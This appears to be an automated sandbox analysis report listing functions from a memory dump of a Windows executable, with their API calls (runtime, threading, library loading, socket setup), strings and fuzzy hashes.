Instruction ID: 96c0899df0d94e7376a23c1fd91879f38e820a2f8e8e5f01917be07ba15b2510
Opcode Fuzzy Hash: 87f316f5aeb29a15cda193debe7de4ad6898654a8b1890c078107965bcce6c81
Instruction Fuzzy Hash: 65116A716043409FD720DFA9988AF47BFE9BB81759F04082DF4469B252E774D948CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 004B2185, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004B218A
__To_wide.LIBCPMT ref: 004B21D6
_wcslen.LIBCMT ref: 004B2200

Strings

invalid char filename argument, xrefs: 004B21E1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologTo_wide_wcslen
String ID: invalid char filename argument
API String ID: 3743069396-1242024027
Opcode ID: ce248c9b76cab28e3bfe0f4cf382fe857c104996694ccf4999fe2e4bab742bed
Instruction ID: fa1ab27e1ba1122e289714b8d9f02065ffaf2acf568b413928bd7f12dd88e1a8
Opcode Fuzzy Hash: ce248c9b76cab28e3bfe0f4cf382fe857c104996694ccf4999fe2e4bab742bed
Instruction Fuzzy Hash: AD219F719042099EDB14EF98DA85AEEBBB8FF18310F1005AFE104E7281DBB45F40CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00413208, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00412ECB: __EH_prolog.LIBCMT ref: 00412ED0

__CxxThrowException@8.LIBVCRUNTIME ref: 00413225

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00413230
new.LIBCMT ref: 00413241

Part of subcall function 00413005: __EH_prolog.LIBCMT ref: 0041300A

Part of subcall function 0041046F: __EH_prolog.LIBCMT ref: 00410474

Strings

5A, xrefs: 00413290

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ExceptionException@8RaiseThrow
String ID: 5A
API String ID: 1193697898-1205544748
Opcode ID: 384d465795c22ab1ba6152e2b118ee0d2ee54f20568b894faee348875323fcc2
Instruction ID: 2959379232cb9b729b7ea92543b75de708907a1a88a4badf2d514b17641bbd42
Opcode Fuzzy Hash: 384d465795c22ab1ba6152e2b118ee0d2ee54f20568b894faee348875323fcc2
Instruction Fuzzy Hash: D521F3B1A00209EBC704DFA8C849B9DBBF9FF48328F10425DE0149B682E7B5E944CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00576A2C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00576A31

Part of subcall function 00579730: __EH_prolog.LIBCMT ref: 00579735

_strlen.LIBCMT ref: 00576A53

Strings

}jW, xrefs: 00576A4D
Windows bitmap (*.bmp;*.dib), xrefs: 00576A47, 00576A4C, 00576A5A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: Windows bitmap (*.bmp;*.dib)$}jW
API String ID: 1490583215-1740260866
Opcode ID: 54271a53ae72cbb626b6c16fbf17fe7f9379f2c224ebd6f00fc21604c6392371
Instruction ID: 030bba940c4e6c41b1e2b76196a51ab20cdfe42042398e5736aee373c93e6e37
Opcode Fuzzy Hash: 54271a53ae72cbb626b6c16fbf17fe7f9379f2c224ebd6f00fc21604c6392371
Instruction Fuzzy Hash: 77F0A0B1910644AFDB24AF5CD9067AEFBF8EF91721F10466FF41593692C7B81D0086A4

Uniqueness

Uniqueness Score: -1.00%

Function 00577908, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0057790D

Part of subcall function 00579730: __EH_prolog.LIBCMT ref: 00579735

_strlen.LIBCMT ref: 0057792F

Strings

Sun raster files (*.sr;*.ras), xrefs: 00577923, 00577928, 00577936
UyW, xrefs: 00577929

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$_strlen
String ID: Sun raster files (*.sr;*.ras)$UyW
API String ID: 1490583215-848707096
Opcode ID: ddead4b9a87fd835eccbb75d35e2e3dba18cf440126460d579d3d90bfd3e2ccc
Instruction ID: 29e51aecd8a14f9d31a8023f2f254d11cadb7f92f184b1635359828d0c3eb00c
Opcode Fuzzy Hash: ddead4b9a87fd835eccbb75d35e2e3dba18cf440126460d579d3d90bfd3e2ccc
Instruction Fuzzy Hash: 18E0E5729101149FDB14AF58D8027AEBBBCEF91721F10026FF41493282C7B41D0096A5

Uniqueness

Uniqueness Score: -1.00%

Function 0041645F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00416464
std::exception::exception.LIBCONCRT ref: 00416481

Part of subcall function 0040F2EC: ___std_exception_copy.LIBVCRUNTIME ref: 0040F313

Part of subcall function 0041CC56: __EH_prolog.LIBCMT ref: 0041CC5B
Part of subcall function 0041CC56: __CxxThrowException@8.LIBVCRUNTIME ref: 0041CCA9

Strings

\$n, xrefs: 00416498
could not convert calendar time to UTC time, xrefs: 00416479

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Exception@8Throw___std_exception_copystd::exception::exception
String ID: \$n$could not convert calendar time to UTC time
API String ID: 4220666059-2154543917
Opcode ID: d7fddeb6a064ba2be686af1137db9a1ef2c884885b7df00f073050f86353281e
Instruction ID: 8a9a92933aec560c30ce54c15b6476c3cd712f5fe7399fc520bae466908f9048
Opcode Fuzzy Hash: d7fddeb6a064ba2be686af1137db9a1ef2c884885b7df00f073050f86353281e
Instruction Fuzzy Hash: 11E0927094410AABDF00FF90D4127EDBF75EB10308F00406DE80966682DB354A89C7C9

Uniqueness

Uniqueness Score: -1.00%

Function 00694DA2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,00694E72,00000000), ref: 00694DB8
FreeLibrary.KERNEL32(00000000,00000000,?,00694E72,00000000), ref: 00694DC7
_free.LIBCMT ref: 00694DCE

Strings

rNi, xrefs: 00694DA8, 00694DCD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: rNi
API String ID: 621396759-4070628955
Opcode ID: 34b808362cbe94b35fb9f7d9d15df1adc94c0a75e731caff01fbd810c097c0fa
Instruction ID: cc26c4fcb4a770e691d764eabadab309c4522081c77c2f79e02484117e592f6e
Opcode Fuzzy Hash: 34b808362cbe94b35fb9f7d9d15df1adc94c0a75e731caff01fbd810c097c0fa
Instruction Fuzzy Hash: 3EE04632400724ABDB212B45E848F96BBAAEF40321F14802AE55916960CB75AC99CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F250, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0040F255
GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 0040F261

Strings

CreateSymbolicLinkW, xrefs: 0040F25B
kernel32.dll, xrefs: 0040F250

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleModuleProc
String ID: CreateSymbolicLinkW$kernel32.dll
API String ID: 1646373207-1962376091
Opcode ID: bd1c4cbd6ce50e022914dd3e2c166698ba0eed112ea3e3cb77a4a08f240cc9c4
Instruction ID: 590e85ebbecf18d2bf37684d831ec6b356c8ba3942a5e88775856824f88f2486
Opcode Fuzzy Hash: bd1c4cbd6ce50e022914dd3e2c166698ba0eed112ea3e3cb77a4a08f240cc9c4
Instruction Fuzzy Hash: 19B092B05823D0ABDB005BE1ACCD91C3B2ABA14702701A451F842CE664DFB442828E14

Uniqueness

Uniqueness Score: -1.00%

Function 0040F230, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0040F235
GetProcAddress.KERNEL32(00000000,CreateHardLinkW), ref: 0040F241

Strings

CreateHardLinkW, xrefs: 0040F23B
kernel32.dll, xrefs: 0040F230

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AddressHandleModuleProc
String ID: CreateHardLinkW$kernel32.dll
API String ID: 1646373207-294928789
Opcode ID: e8356c8db0eb464db37513e9733c3783437a20d9dd90c0bb0afac3dc72d696ec
Instruction ID: 14882fced2e313a79112ea7472962911ea01498a907f2e19416e74a3366ec373
Opcode Fuzzy Hash: e8356c8db0eb464db37513e9733c3783437a20d9dd90c0bb0afac3dc72d696ec
Instruction Fuzzy Hash: 5EB092B15813C49BDB005BF2AC4D91C3AAAFA0A782B019021F141AE660DBB852828F14

Uniqueness

Uniqueness Score: -1.00%

Function 00477584, Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00477589

Part of subcall function 00477972: __EH_prolog.LIBCMT ref: 00477977

Part of subcall function 00461060: __EH_prolog.LIBCMT ref: 00461065

Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004610E6
Part of subcall function 00461060: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000), ref: 0046111C

Part of subcall function 00476ADD: __EH_prolog.LIBCMT ref: 00476AE2

Part of subcall function 004B1FC7: __EH_prolog.LIBCMT ref: 004B1FCC

Part of subcall function 004B0769: __EH_prolog.LIBCMT ref: 004B076E

Part of subcall function 0044E82C: __EH_prolog.LIBCMT ref: 0044E831

Part of subcall function 0044DE59: __EH_prolog.LIBCMT ref: 0044DE5E
Part of subcall function 0044DE59: new.LIBCMT ref: 0044DE84
Part of subcall function 0044DE59: GetModuleHandleA.KERNEL32(?,?,?,?,00000000), ref: 0044DEEB
Part of subcall function 0044DE59: GetProcAddress.KERNEL32(?,?), ref: 0044DF6C

GetCurrentProcess.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00477877
QueryFullProcessImageNameW.KERNEL32(00000000), ref: 0047787E
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00477893

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$ByteCharModuleMultiNameProcessWide$AddressCurrentFileFullHandleImageProcQuery
String ID:
API String ID: 1400389073-0
Opcode ID: 0c521fe5597c288fe85cd66e0715b78ba9f355da584d481fed6c3fa1574c9daa
Instruction ID: 77dbdb629de6e5b2ffc1487bde3b959b04d2b71e04adcbb9b4aafba9b4c546bf
Opcode Fuzzy Hash: 0c521fe5597c288fe85cd66e0715b78ba9f355da584d481fed6c3fa1574c9daa
Instruction Fuzzy Hash: FF919170D05248DEEB10EBA9C885BEEBBB4EF55318F24409EE005672D2DBB81F44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00428C15, Relevance: 6.2, APIs: 4, Instructions: 215COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00428C19

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 00428C24

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ExceptionException@8H_prologRaiseThrow
String ID:
API String ID: 1681477883-0
Opcode ID: 5675610c71a235faaaafb9446d66b19f2f8eb18735391d7e7c705efdc6241944
Instruction ID: 09943afd76b2b5a18f3034c807080fe7ad61a4c7bfeed76e4b810f933ad66ed5
Opcode Fuzzy Hash: 5675610c71a235faaaafb9446d66b19f2f8eb18735391d7e7c705efdc6241944
Instruction Fuzzy Hash: D681E470904208AFDB18EFA5D881BEEBBB8EF45318F10851EF151A72D2DB7C5A45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 005836B1, Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 00583709
MultiByteToWideChar.KERNEL32(?,00000009,?,00000002,?,00000000,?,?,00000000), ref: 00583757
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 005837C9
MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,?,00000000,?,?,00000000), ref: 005837F1

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide$Getcvt
String ID:
API String ID: 3195005509-0
Opcode ID: a3b2177d8fdd4ecda830a65a8d8357f5f0bfd8249116f44052f9ee3a900161d2
Instruction ID: 028dbf08a08d6e8980168f097ad405ac58da46d692f257a6541ef53f62bb6532
Opcode Fuzzy Hash: a3b2177d8fdd4ecda830a65a8d8357f5f0bfd8249116f44052f9ee3a900161d2
Instruction Fuzzy Hash: 2B41DFB1600385AFEB21AF69C841B6ABFE9FF41B10F144429EC51EB290E771DE44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00424FD8, Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424FDD
EnterCriticalSection.KERNEL32(?), ref: 00424FF1
LeaveCriticalSection.KERNEL32(?), ref: 0042501F
CloseHandle.KERNEL32(00000004), ref: 00425044

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CloseEnterH_prologHandleLeave
String ID:
API String ID: 2171098948-0
Opcode ID: df9b0c5d2acae975ba0c9cfe18548a68fdcd4b939370d9e62fa530923d11b1b3
Instruction ID: 85d8d80b7c220fc05af3a2f7d44c9744e694d5b0b3e2059fba10bea74bec90c5
Opcode Fuzzy Hash: df9b0c5d2acae975ba0c9cfe18548a68fdcd4b939370d9e62fa530923d11b1b3
Instruction Fuzzy Hash: 54417971A01A259FCB28DFA8D880BAEFBB0BF04710F40415ED915AB341CB74AE40CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 006B042E, Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00000107,00000000,00000000,?,?,?,?,00000001,00000107,?,00000001,?,00000000), ref: 006B047B
MultiByteToWideChar.KERNEL32(?,00000001,?,00000107,00000000,?,?,?,?,00000001,00000107,?,00000001,?,00000000,?), ref: 006B0504
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000107,?,00000001,?,00000000,?,00000107,?), ref: 006B0516
__freea.LIBCMT ref: 006B051F

Part of subcall function 006A108E: RtlAllocateHeap.NTDLL(00000000,00000003,00000003,?,006AAD9E,00001000,00000000,?,?,?,006A082B,00000000,00000000,00000000,?,?), ref: 006A10C0

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 97f42e6e783000c67b4c068e863534cc4fc4ab11a9e61b10c8c2f8b25a44b242
Instruction ID: cc9d3210c437c6616901ac33e6ac38521ebe38c45e241f758d63c01827b6ee30
Opcode Fuzzy Hash: 97f42e6e783000c67b4c068e863534cc4fc4ab11a9e61b10c8c2f8b25a44b242
Instruction Fuzzy Hash: DB31AEB2A0021AABEF259F64CC45DEF7BA6EB40310F144169FC05DA290EB35CD90CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00414E09, Relevance: 6.1, APIs: 4, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414E0E
TlsGetValue.KERNEL32 ref: 00414E88
TlsSetValue.KERNEL32(?), ref: 00414EA1
TlsSetValue.KERNEL32(?,?,?,?,?,?,?), ref: 00414ED4

Part of subcall function 00414F2A: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 00414F51
Part of subcall function 00414F2A: GetLastError.KERNEL32 ref: 00414F5B

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Value$CompletionErrorH_prologLastPostQueuedStatus
String ID:
API String ID: 158160221-0
Opcode ID: 586e919ffb6655bfbbf2e445b8256441f2e0ea899b9af754ab72a0c52bca22dc
Instruction ID: d71777ad571c8ca19c34f38a4bac23b68ce0d84137122360d3092e72d4341679
Opcode Fuzzy Hash: 586e919ffb6655bfbbf2e445b8256441f2e0ea899b9af754ab72a0c52bca22dc
Instruction Fuzzy Hash: DC31C071D00608EFDB05DFA9D8819EEBBB5FF88300F10813EE415A7260DB395A098B94

Uniqueness

Uniqueness Score: -1.00%

Function 00416C3E, Relevance: 6.1, APIs: 4, Instructions: 67networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 00416C76

Part of subcall function 00416B9A: __EH_prolog.LIBCMT ref: 00416B9F

htonl.WS2_32(00000000), ref: 00416C8D
htonl.WS2_32(00000000), ref: 00416C94
htons.WS2_32(?), ref: 00416CA8

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: htonlhtons$H_prolog
String ID:
API String ID: 984249084-0
Opcode ID: 69d3e31cd2f03239069176d02f0421dedb84e356e9a7d0d2334ac185ddb40043
Instruction ID: e7ff9ceaa40ac1d9ce4b5bbe90b71808129459a827f70b7e23d2d4d09dd11159
Opcode Fuzzy Hash: 69d3e31cd2f03239069176d02f0421dedb84e356e9a7d0d2334ac185ddb40043
Instruction Fuzzy Hash: 81216376914204ABCB209FA4DC06F9AB7F9FF48710F00852BF956D7690E738E8548B95

Uniqueness

Uniqueness Score: -1.00%

Function 00410817, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041081C
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 00410856
EnterCriticalSection.KERNEL32 ref: 00410867
LeaveCriticalSection.KERNEL32(?,?), ref: 00410897

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: 9f8ffbdbcf60fbe60262c8921c14737b7b0069439acc42f7ec21859bc28d27a0
Instruction ID: 595c1b188952251bd2dacb951881a4d652b48873ec76a9dc35cae2145f26181e
Opcode Fuzzy Hash: 9f8ffbdbcf60fbe60262c8921c14737b7b0069439acc42f7ec21859bc28d27a0
Instruction Fuzzy Hash: FC11EF71905215DBDB15EF64C885BAFBBB8FF45729F10006EE801AB341C7B89981CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 004AB56B, Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004AB570
std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 004AB58D

Part of subcall function 005843D7: __EH_prolog3.LIBCMT ref: 005843DE
Part of subcall function 005843D7: new.LIBCMT ref: 005843E5
Part of subcall function 005843D7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005843FC

Part of subcall function 004211A8: __EH_prolog.LIBCMT ref: 004211AD
Part of subcall function 004211A8: std::_Lockit::_Lockit.LIBCPMT ref: 004211C1
Part of subcall function 004211A8: std::_Lockit::~_Lockit.LIBCPMT ref: 004211E1

std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 004AB5A9

Part of subcall function 00583CC5: __EH_prolog3.LIBCMT ref: 00583CCC
Part of subcall function 00583CC5: std::_Lockit::_Lockit.LIBCPMT ref: 00583CD6
Part of subcall function 00583CC5: Concurrency::cancel_current_task.LIBCPMT ref: 00583D09
Part of subcall function 00583CC5: std::_Lockit::~_Lockit.LIBCPMT ref: 00583D7C

_Yarn.LIBCPMT ref: 004AB5BD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Lockitstd::_$Locimp::_std::locale::_$H_prologH_prolog3LocimpLockit::_Lockit::~_$AddfacConcurrency::cancel_current_taskLocimp_New_Yarn
String ID:
API String ID: 3501155517-0
Opcode ID: 062c1b1ec6b5b8f7a93138f2578596e16de038775c30bf3b263c81f7f22aedb0
Instruction ID: bfeef356df4ba868fc20926f83e03bfe523200e894b43230a5974da24efb3e8f
Opcode Fuzzy Hash: 062c1b1ec6b5b8f7a93138f2578596e16de038775c30bf3b263c81f7f22aedb0
Instruction Fuzzy Hash: E011DD71A00615AFD714EF55C44AB7AFBA4FF21326F00822EE50697692CB79AD10CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 004B0DE2, Relevance: 6.1, APIs: 4, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004B399D: __EH_prolog.LIBCMT ref: 004B39A2

__CxxThrowException@8.LIBVCRUNTIME ref: 004B0DFC

Part of subcall function 0068E3DE: RaiseException.KERNEL32(?,00582150,P!X,?,?,0078FB6C,?,?,?,?,?,00582150,?,00783398,?), ref: 0068E43D

__EH_prolog.LIBCMT ref: 004B0E07
GetProcessHeap.KERNEL32(00000000,00000040), ref: 004B0E1B
HeapAlloc.KERNEL32(00000000), ref: 004B0E22

Part of subcall function 0040F438: __EH_prolog.LIBCMT ref: 0040F43D

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Heap$AllocExceptionException@8ProcessRaiseThrow
String ID:
API String ID: 1668733864-0
Opcode ID: d23a0b3dc1c94f81aa508c56cd2c60338607f869b22be358fc248e92d61e491c
Instruction ID: 350d84d1d5f25fe52a91066693df434387abb4621305467a0a35fe1cc05a434f
Opcode Fuzzy Hash: d23a0b3dc1c94f81aa508c56cd2c60338607f869b22be358fc248e92d61e491c
Instruction Fuzzy Hash: 771191B1D05258DBDB10EFA9C54ABAEBFB8EF08700F10046EE544A7242D7B95E04CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 006AB2BD, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,006AB264,?,00000000,00000000,00000000,?,006AB590,00000006,FlsSetValue), ref: 006AB2EF
GetLastError.KERNEL32(?,006AB264,?,00000000,00000000,00000000,?,006AB590,00000006,FlsSetValue,0071F508,0071F510,00000000,00000364,?,006A9FB1), ref: 006AB2FB
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006AB264,?,00000000,00000000,00000000,?,006AB590,00000006,FlsSetValue,0071F508,0071F510,00000000), ref: 006AB309

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 4376a6cb57514a3e2f998794821d34c283dc87282710ac62b7bad34459de6416
Instruction ID: 4bdbfffff69f1da8354d80988fd09d6fcd354b261645325d4f3cf7198916ad7f
Opcode Fuzzy Hash: 4376a6cb57514a3e2f998794821d34c283dc87282710ac62b7bad34459de6416
Instruction Fuzzy Hash: F401FC32605223ABDF215B68AC44AA777DAEF06760B115124F905D7242D760DD018EE0

Uniqueness

Uniqueness Score: -1.00%

Function 0042400C, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424011
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 00424045
EnterCriticalSection.KERNEL32 ref: 00424056
LeaveCriticalSection.KERNEL32(?,?), ref: 00424079

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: 69df4b39d4aff6cd6478f95013156769a9bb6003584e35ece7b260fea5d2cb0d
Instruction ID: bf8b0a2ab09907e7b3f54f1672bf021df903123a154a6b7f892ca0429662d47f
Opcode Fuzzy Hash: 69df4b39d4aff6cd6478f95013156769a9bb6003584e35ece7b260fea5d2cb0d
Instruction Fuzzy Hash: 13118B71A0021AAFC710DF69D885B9EFBB8FF55721F00412AE515E7650D7B0AA54CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00424092, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00424097
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 004240C9
EnterCriticalSection.KERNEL32 ref: 004240DA
LeaveCriticalSection.KERNEL32(?,?), ref: 004240FD

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: ad209a522ce5a102365635a8d2a9c0ab8a9610261a2056c889f7d081ebeb0a76
Instruction ID: 5ef1c91e3d7a23d27ffad0caffddf353d30ea94ee27d0fbe51ee90fa746b6dfd
Opcode Fuzzy Hash: ad209a522ce5a102365635a8d2a9c0ab8a9610261a2056c889f7d081ebeb0a76
Instruction Fuzzy Hash: 4D118E7190061AEFD710CF65D884BAEFBB8FF55725F10422AE91497250D3B0AA55CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00452EC0, Relevance: 6.0, APIs: 4, Instructions: 48networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00452EC5
WSAStartup.WS2_32(00000101,?), ref: 00452EFC
gethostbyname.WS2_32(?), ref: 00452F1B
inet_ntoa.WS2_32(?), ref: 00452F28

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prologStartupgethostbynameinet_ntoa
String ID:
API String ID: 3789426293-0
Opcode ID: f9bbe8c004ec359deb926b868d3b580d4f11b5644436f6f8a6ffa73d4713af27
Instruction ID: d8f70ffa042a331975101c60f6318a458026d59f382951e2fe8e46417805bd2a
Opcode Fuzzy Hash: f9bbe8c004ec359deb926b868d3b580d4f11b5644436f6f8a6ffa73d4713af27
Instruction Fuzzy Hash: DF115E71E012089FCB10DFA9D889AEDBBF9FF49310F0080ABE505D3250D7744A058B95

Uniqueness

Uniqueness Score: -1.00%

Function 00414FC5, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00414FCA
PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?), ref: 00414FE6
EnterCriticalSection.KERNEL32(?), ref: 00414FF8
LeaveCriticalSection.KERNEL32(?,?), ref: 0041501A

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: CriticalSection$CompletionEnterH_prologLeavePostQueuedStatus
String ID:
API String ID: 3890610498-0
Opcode ID: 795c4aaf7302f1d8da56c00ef435025cb7637fe8cdecffaf110e4b1caab2fa0b
Instruction ID: e4ccac70859e7255c06649105df93775297bbe88067fbb39c88871d14b751ec6
Opcode Fuzzy Hash: 795c4aaf7302f1d8da56c00ef435025cb7637fe8cdecffaf110e4b1caab2fa0b
Instruction Fuzzy Hash: B8018B72500609EFDB04DFA4DD84BEABBB9FF48325F00012AF60596590C7B09E55CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00417590, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 369COMMON

Download Yara Rule

APIs

Part of subcall function 0044DB7B: __EH_prolog.LIBCMT ref: 0044DB80
Part of subcall function 0044DB7B: GetTickCount64.KERNEL32 ref: 0044DBA6

__aulldiv.LIBCMT ref: 00417605

Part of subcall function 0041CE76: __EH_prolog.LIBCMT ref: 0041CE7B

Part of subcall function 00411BC8: std::_Deallocate.LIBCONCRT ref: 00411BF8

Part of subcall function 0041CECB: __Thrd_sleep.LIBCPMT ref: 0041CF5E

Strings

z, xrefs: 004178FE
E, xrefs: 00417905

Memory Dump Source

Source File: 00000013.00000002.471421774.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: H_prolog$Count64DeallocateThrd_sleepTick__aulldivstd::_
String ID: E$z
API String ID: 2474810027-3358126013
Opcode ID: 9710171cc75bdb54049572554e24b32ebe35bc54255b3eab302f9bc902894c9d
Instruction ID: 2eaba0ccaa686da508d11499954a1da9c3e741317afdc22d313da4b1b5c9f64b
